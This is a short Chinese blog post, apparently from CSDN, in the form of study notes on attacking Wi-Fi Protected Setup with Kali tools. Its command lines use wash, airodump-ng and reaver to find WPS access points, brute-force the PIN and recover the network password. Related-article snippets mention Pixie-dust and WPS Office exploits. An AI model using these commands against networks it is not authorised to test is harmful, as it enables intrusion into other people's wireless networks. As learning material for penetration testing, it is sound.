WPS 攻击渗透-学习笔记

最新推荐文章于 2024-04-22 10:31:19 发布
最新推荐文章于 2024-04-22 10:31:19 发布
阅读量738 收藏 1
点赞数
分类专栏: kali 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/winux123/article/details/103266539
版权
kali 同时被 2 个专栏收录
14 篇文章 1 订阅
订阅专栏
渗透
14 篇文章 2 订阅
订阅专栏

1、启用监听模式(Monitor Mode),发现支持WPS的AP   如果进入监听模式请查阅前两章有关WPA WEP攻击的文章

wash -C -i wlan0mon#-C 忽略错误帧 -i 指定网卡

airodup-ng wlan0mon --wps

2、爆破PIN码

reaver -i wlan0mon -b <AP mac> -vv #-vv 显示详细的信息

3、在得出PIN码后,通过下面指令获取无线密码

reaver -i wlan0mon -b <AP mac> -vv -p 88888888 #-p 获取到的PIN码

干货!!综合自动化无线密码破解工具 wifite

鱼与羽
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
无线渗透_WPS攻击
分享学习网络的点点滴滴
07-07 484
WPS是WIFI联盟2006年开发的一项技术通过PIN码来简化无线接入的操作,无需记住PSK路由器和网卡各按一个按钮就能接入无线PIN码是分为前后各4位的2段共8位数字安全漏洞PSK:218,340,105,854,8962011年被发现安全涉及漏洞接入发起方可以根据路由器的返回信息判断前4位是否正确而PIN码的后4位只有1000种定义的组合(最后一位是checksum)所以全部穷举破解只需要11000次尝试标准本身没有设计锁定机制,目前多个厂商已实现锁定机制包括Linksys在内的很多厂家的无线路由器无法
wps-office-11.1.0.10920-1.aarch64.rpm
03-28
wps-office-11.1.0.10920-1.aarch64.rpm
RichWPS-Monitor:监视Web处理服务(WPS)的监视系统
05-14
RichWPS-Monitor 一个监视Web处理服务(WPS)的监视系统。 请访问以获取发行版和JavaDoc! 库和框架 (用于简单的WpsClient) V2.1变更日志 现在,所有日志记录输出都重定向到log4j,以防止大量垃圾邮件 仅将Level.ERROR及以上事件打印到控制台 CLI已添加 启动参数已添加 ApplicationInfo类添加了一些常量,例如VERSION,PROJECT_SITE等。 getProcess(endpoint : URL, identifier : String) : WpsProcessEntity添加到MonitorControlService getProcess(endpoint : URL, identifier : String) : WpsProcessEntity方法 RESTful接口现在实现了java.lang.Aut
htb-WifineticTwo Pixie-dust attack 是利用路由器芯片随机密钥(nonce)生成的漏洞,离线破解 WPS PIN 的一种无线攻击方案
最新发布
whale_waves的博客
04-22 1039
Pixie-dust attack 是利用路由器芯片随机密钥(nonce)生成的漏洞,离线破解 WPS PIN 的一种无线攻击方案 wps psk 在 WPA PSK 中,使用预共享密钥(Pre-Shared Key,PSK)来对无线网络进行加密,并确保只有知道该密钥的用户才能访问网络 使用 WPA PSK 时,用户需要在无线路由器上配置一个预共享密钥(通常是一个密码)。然后,所有连接到该网络的设备都需要使用相同的预共享密钥来加密和解密通信。这种方式确保了网络通信的保密性,因为只有知道预共享密钥的用户
WPS Office 漏洞复现
08-10 1526
WPS Office是金山软件公司开发的,中国领先的办公软件套件,包含文字、表格和演示三个组件,支持创建、编辑各种文档,并具有强大的数据计算、统计和分析功能。其特点包括全面支持PPT动画效果、支持文档编辑和阅读模式、支持共享播放和Airplay、DLNA播放PPT等。WPS Office还支持新建Excel文档、查看加密文档、筛选活动单元格所在行列、自由调整行高列宽等功能。
WPS漏洞复现(不含漏洞分析)
qq_29616295的博客
08-11 1012
想搞明白这个漏洞的原理必须明白clientweb.docer.wps.cn.{xxxxx}wps.cn在WPS中究竟是如何调用的远程服务,怎么去修改docx中的相关模块(exp中有),和使用js执行calc的原理(在1.html中,不太懂js看不太懂),等工作结束了再详细分析(懂得都懂)
WPS office 最新未公开 0Day漏洞警示
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-23 1589
0day 漏洞可以由黑客或攻击者利用来攻击他们的目标,可以通过不同的方式来实现,例如,攻击者可以利用远程漏洞攻击,通过恶意的网络链接或 e-mail 附件来攻击目标,或者利用本地漏洞攻击,在目标系统上安装木马程序或其他恶意程序。近日,网传监测发现WPS Office for Windows版本 存在0day漏洞,攻击者可以利用该0day漏洞在受害者主机上执行任意恶意文件,高危级别,官方尚未对此发布修复漏洞,目前建议只能临时弃用wps或者不要点开未知文件,尤其在线网络文件,中招概率极大。
基于wps在线编辑wps-view-java-master
12-21
"基于wps在线编辑wps-view-java-master"这个标题表明这是一个与WPS(金山办公软件)相关的项目,特别强调了其在线编辑功能。"wps-view-java-master"部分暗示这是一个使用Java语言开发的主分支项目,可能是一个服务器...
wps-symbol-fonts.zip
03-05
标题中的“wps-symbol-fonts.zip”表明这是一个与WPS Office相关的压缩文件,包含了特定的符号字体。在Ubuntu操作系统中,可能因为某些原因,WPS Office在运行时可能会遇到字体缺失的问题,导致文档显示不正常或者...
wps-font-symbols.zip
04-21
该压缩包名为"wps-font-symbols.zip",内含文件为"wps-font-symbols-master",这通常意味着这是一个包含WPS字体符号的源代码或资源库。下面我们将深入探讨WPS字体符号的使用和重要性,以及如何通过这个资源包来优化...
wps-office-10.1.0.6634-1.x86_64.rpm
05-19
wps-office-10.1.0.6634-1.x86_64.rpm
reaver-wps, 针对 Wifi protected 设置的强力攻击.zip
10-10
reaver-wps, 针对 Wifi protected 设置的强力攻击 带MAC的 REAVER WPSREAVER WPS修改版本,带有MAC地址上一个字符转换器,以加速攻击。好吧,有些时候AP会在成功的pin尝试后拒绝"eapol请求"。 我对同时运行的reaver ( 。-m参数) 实例进行了一些测试
【高危】 WPS Office 存在代码执行漏洞
murphysec的博客
08-10 1378
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。产品可以极低成本的和现有开发流程中的各种工具一键打通,包括 IDE、Gitlab、Bitbucket、Jenkins、Harbor、Nexus 等数十种工具无缝集成。避免点击带有超链接的图片或对象。
[渗透测试]—6.2 无线网络安全漏洞和攻击技术
Andy0214的专栏
06-27 5170
在本章节中,我们将学习一些常见的无线网络安全漏洞和攻击技术,如WPS漏洞、Evil Twin攻击等。我们将尽量讲解得详细、通俗易懂,并提供尽可能多的实例。
无线渗透(中)--WPS破解
hl1293348082的专栏
04-07 5423
0x00. 前言 基于第一篇文章WPA密码破解的反馈,有人提问说能否写一下关于WPA2的文章。笔者在这里回答一下,破解WPA2的流程和WPA是一样的,WPA2只是采用了更加复杂可靠的加密算法(利用CCMP替代了TKIP,AES替代了RC4),不过依然可以利用上一篇文章中提到的攻击原理来暴力破解PSK,所以笔者不会再写WPA2的内容。另外,由于某些缘故WEP密码破解可能不会写了,大家见谅,不过其他内容依然会陆续推出。 0x01. WPS简介 WPS是由Wi-Fi联盟组织实施的认证项目,主要致力于简化无线
HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现
dzqxwzoe的博客
11-17 103
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
无线网络WPS攻击
游客
04-29 5161
无线网WPS攻击(测试未成功) 提前准备: 注意:顺序最好不要乱了顺序。 1.service network-manager stop 2. airmon-ng check kill 3.连接外置网卡 4.airmon-ng start wlan0 (把网卡变为监听模式,输入ifconfig可看到wlan0已变成wlan0mon) 正式步骤: 1.利用wash扫描附近开启WPS的网络:wash -...
大学计算机基础:Windows-7与WPS-Office-2019课件详解
本资源是一份针对大学计算机基础课程的PPT,内容涵盖了Windows-7操作系统和WPS-Office-2019的使用,以及计算机基础知识的深入探讨。课程的第一章主要介绍了计算机与信息技术的基础,包括科学思维的培养。 在这一章...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值